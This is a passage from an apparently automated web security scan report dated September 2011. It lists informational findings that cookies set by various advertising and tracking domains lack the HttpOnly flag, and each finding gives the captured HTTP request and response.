Set-Cookie: rsiPus_3Us7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UTqe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NyfH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_C1HA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hCo4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5uBS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mAGT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RObH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uEcy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xCvN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ebxh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j_e_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9mAa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-4qM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fMbS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AKta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pXq4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_g7pa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zbII=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GEDh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MRmN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5uiD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JGOr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kry8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Y6sq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_psQo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JI-L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_PAkW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SRnI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aSXs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9hcp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bq8b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lww9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_n6fk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__KA3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_YeNy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Pk3I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_65qD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuxR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l77R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GQV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2jdP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7SED=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_3Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_PtS0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p1rh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-lLI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lfkx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yt-D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KhUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LqXQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Vodh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_r94O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0rr2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RAwv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AHDy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_moDT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7bUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UF3V="MLtXrlEusS9roBD3ElioJsiF6sySUVfem3F3zgv5P+XsmyQaJ+0k7MGOSKJRnNlEyGtzHzk5mDju5hlW5NwWJNSy3FWGQChLCmu5FMT9Fpo1Qcv041wsRTflypSLkJ9eQVhctxoj+x1apTdBCWH42nprnPYbIoWxazGLrb/KD+A5h23Q0hhqnxgFbPS1+lDgrNtLaBhIM2vP3nBqmfmrq1mj+YZOVMIzdjtBBdiMduSHmogIVaKDrQjT5pWjfsXtP6NGQRew48EHjwAjj9+t2ahbA5RGrgTOQjNT/WZbiGxd3KiLH2//jU2CDyuU"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:43:01 GMT

GIF89a.............!.......,...........D..;

14.26. http://ads.undertone.com/ajs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: A28X, UTID, _UTLIA[239096], UTLIA and UTPROFILES (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajs.php?01AD=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg&01RI=5E9E1CAB1AD4553&01NA=&&zoneid=13473&cb=9499299828&t=1315078988.592&fv=10&x=0&y=0&sw=1920&sh=1156&cw=1217&ch=9749&loc=http%3A//content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1&ct=1 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e68; A28X=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 3605
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 00:45:08 GMT
Connection: close
Set-Cookie: A28X=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg; expires=Sun, 02-Oct-2011 00:45:08 GMT; path=/; domain=.undertone.com
Set-Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e688473407c8c4fce8899adcc4b; expires=Mon, 03-Sep-2012 00:45:08 GMT; path=/
Set-Cookie: _UTLIA[239096]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: UTLIA=239096.lqz3aw-13473; expires=Tue, 04-Oct-2011 00:45:08 GMT; path=/
Set-Cookie: UTPROFILES=15221%2317%3A1%2C28%7C1022%3A1%7C1023%3A1%7C4209%3A1; expires=Sat, 03-Dec-2011 00:45:08 GMT; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write("<"+"SCRIPT language=\'JavaScript1.1\' SRC=\"http://ad.doubleclick.net/adj/N763.no_url_specifiedOX2619/B5770010.3;sz=300x250;pc=[TPAS_ID];click0=http://ads.undertone.com/c?oaparams=2__b
...[SNIP]...

14.27. http://ads.undertone.com/fc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /fc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: UTID and UTPROFILES (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fc.php?dp=8&pid=D,T,6741 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg; UTID=4a03b50017dd46ddaa511cbfbfb29e68; UTPROFILES=15221%2317%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:45:13 GMT
Connection: close
Set-Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e68; expires=Mon, 03-Sep-2012 00:45:13 GMT; path=/
Set-Cookie: UTPROFILES=15221%2317%3A1%2C35%7C1022%3A1%2C2%7C1023%3A1%2C2%7C4209%3A1%2C2; expires=Sat, 03-Dec-2011 00:45:13 GMT; path=/

GIF89a.............!.......,...........D..;

14.28. http://ads.undertone.com/l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=239096&campaignid=45394&zoneid=13473&UTLIA=1&cb=0137d6006cde4f87928e17a0e65cf019&bk=lqz3av&id=9b717gcon8jpjqppi0uei5mr5 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg; UTID=4a03b50017dd46ddaa511cbfbfb29e68; UTPROFILES=15221%2317%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:45:13 GMT
Connection: close
Set-Cookie: _UTLIA[239096]=lqz3fd-13473; expires=Tue, 04-Oct-2011 00:45:13 GMT; path=/
Set-Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e68; expires=Mon, 03-Sep-2012 00:45:13 GMT; path=/

GIF89a.............!.......,...........D..;

14.29. http://ak1.abmr.net/is/ads.undertone.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/ads.undertone.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/ads.undertone.com?U=/ajs.php&V=3-Pk%2fbY9lNQC4At5F94KswkvL1NPSP7nt8HKX%2fF6NhEm5cTN68Tlrp4i2kKFtcogeJ&I=5E9E1CAB1AD4553&D=undertone.com&01AD=1&&zoneid=13473&cb=9499299828&t=1315078988.592&fv=10&x=0&y=0&sw=1920&sh=1156&cw=1217&ch=9749&loc=http%3A//content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1&ct=1 HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=3HA_EEu1KXWRP0QJym87Nlm7xnI-zcps1f5SV9G66zkM0FxK6B8vp8g

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ads.undertone.com/ajs.php?01AD=3LbeoS9TTQFE4L2AwPSPny5JgU_8NH14s0kXLQW6tpcN6pXxIaedm5Q&01RI=5E9E1CAB1AD4553&01NA=&&zoneid=13473&cb=9499299828&t=1315078988.592&fv=10&x=0&y=0&sw=1920&sh=1156&cw=1217&ch=9749&loc=http%3A//content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1&ct=1
Expires: Sun, 04 Sep 2011 00:45:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:45:08 GMT
Connection: close
Set-Cookie: 01AI=2-2-F6248E50D3C9B20BFFF9EB5EA664B56B73DB880669BDB36D0AED2F292EE60908-3CC9ECB738DC6097BABD3A5783E7E50840BA1F5253AE728A47DC91643B7FE4A9; expires=Mon, 03-Sep-2012 00:45:08 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


14.30. http://ak1.abmr.net/is/tag.admeld.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/tag.admeld.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/js/741/mcclatchy/728x90/sacramento_sacbee&V=3-u9rS3RK4%2fHVCpMS5%2fXkUHptR4WXGInZ3QrOhpGcpkOGTF%2fH6Fxq4JA%3d%3d&I=5FB3F64412C0344&D=admeld.com&01AD=1&t=1315097086910&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&refer=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-31180B5D5D231F5622E9106D62F00B2EDF4A7C273A353023DD5E966844A1A54B-6809602891ACEF76A3868E1D4796F5A99983F94421DBF59156B8599DC3F68A9D

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee?01AD=32YTIBBAp3mT-Zua6BVL7Ucqbkbllihfkgh02ZrjxdWTDGXg-HimksA&01RI=5FB3F64412C0344&01NA=&t=1315097086910&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&refer=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html
Expires: Sun, 04 Sep 2011 01:01:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:01:16 GMT
Connection: close
Set-Cookie: 01AI=2-2-159DEC38549F1F614D8A2426086D786875EEE45322C9F9736F0A6F6D9BF2D701-1607A532E50134DBA4C933F2985A2049EDBF2DD011F46699E08DEA173165718C; expires=Mon, 03-Sep-2012 01:01:16 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


14.31. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315096942310726%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zz2RAI0uRfisMtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdOKh03Kvii5Taj5XcunNcMDa7Re6IGD4lKWNB0md3rj0Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfsp04qHTcqipLlNqPldy6c1wwH4DELwm2ipwNsNipLFWKZvgDTbwiiAhQOisLcafhbACBAJnPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9sU8nhAxdAK9Qieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 00:57:21 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ei=21&ti=95&vi=11&sti=28&sei=0&sci=0&sai=0&smi=0&pbi=0&sts=1315096942310726&sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0&industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUm1bPVkNOW1aj5XcunNcMDa7Re6IGD4lHbY24BlLWUpAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJP31qI3sBpawEVUJBxdqAyC8xfc9PPC4jRiscMdipXP44sTMcaVpEYlLIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


14.32. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/UND_com/lists/notre-dame-football/statuses.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 01:21:57 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00635
Content-Type: application/json; charset=utf-8
Content-Length: 154
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1315100623
Set-Cookie: guest_id=v1%3A131509931699548357; domain=.twitter.com; path=/; expires=Tue, 03 Sep 2013 13:21:56 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMDU1ZDIyNWEzNjUyZDNiMzI4ZjY2YjQ1YTFhMjY5%250ANzA6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6D2NyZWF0%250AZWRfYXRsKwieE%252BQxMgEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiU3MjY4NTJkZGFhNTM0%250AZTJhODhlNjkxY2EwYmFlZTlkNQ%253D%253D--27f28af8f4e2f6c861614383b06012a62c7dbf03; domain=.twitter.com; path=/; HttpOnly
Expires: Sun, 04 Sep 2011 01:26:56 GMT
Vary: Accept-Encoding
Connection: close

{"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/UND_com\/lists\/notre-dame-football\/statuses.json"}

14.33. http://ar.atwola.com/atd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.atwola.com
Path:   /atd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /atd HTTP/1.1
Host: ar.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:44:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8q DAV/2
Expires: Sun, 04 Sep 2011 00:44:48 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURo DEVo TAIo PSAo IVAo IVDo LOC ONL UNI COM NAV INT STA DEM OUR"
Set-Cookie: cords=MToxMzE1MDk3MDg4OjUsMTMxNTA5NzA4ODo3LDA=; domain=.ar.atwola.com; path=/; expires=Mon, 02 Jan 2012 00:44:48 GMT
Location: http://adadvisor.net/adscores/g.pixel?sid=9201047028&rand=913389
Content-Length: 0
Content-Type: text/plain


14.34. http://as.casalemedia.com/s

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /s

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s?s=102679&u=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&f=1&id=5352232557.328876 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468; CMD1=AAErg05epP8AAP5rAAL86wEBAAABTHFOXqT8AAF0TAADQ4wBAQA*

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 0
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 01:02:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:02:07 GMT
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 01:02:07 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 01:02:07 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 01:02:07 GMT
